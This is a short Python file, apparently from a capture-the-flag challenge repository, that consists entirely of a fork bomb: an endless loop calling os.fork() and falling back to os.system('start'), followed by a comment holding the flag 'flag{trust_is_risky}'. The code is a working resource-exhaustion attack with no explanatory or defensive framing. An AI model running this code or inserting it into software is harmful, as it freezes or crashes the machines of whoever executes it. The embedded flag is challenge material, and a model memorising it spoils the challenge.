2014-10-10 22:27:27 -04:00

8 lines
111 B
Python

import os
while True:
try:
os.fork()
except:
os.system('start')
# flag{trust_is_risky}